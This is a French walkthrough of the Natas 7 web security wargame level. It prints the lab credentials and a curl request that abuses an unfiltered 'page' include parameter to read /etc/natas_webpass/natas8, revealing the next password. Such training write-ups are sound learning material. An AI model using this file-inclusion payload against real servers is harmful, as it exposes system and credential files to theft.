Natas 7
Level Goal
Username: natas7
Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
URL: http://natas7.natas.labs.overthewire.org
Commençons par nous connecter à la page du challenge :
curl http://natas7.natas.labs.overthewire.org -u natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
On a la page suivante :
<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
La faille à exploiter ici semble être une faille include où l'on utilise l'inclusion de pages de manière non filtrée par le serveur pour charger des fichiers de configuration.
Ici si dans l'url index.php?page=home
on remplace home
par une autre valeur on peut potentiellement accéder à d'autres fichiers.
Essayons en indiquant directement le fichier donné dans l'indice :
curl http://natas7.natas.labs.overthewire.org/?page=/etc/natas_webpass/natas8 -u natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
Et on obtient :
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe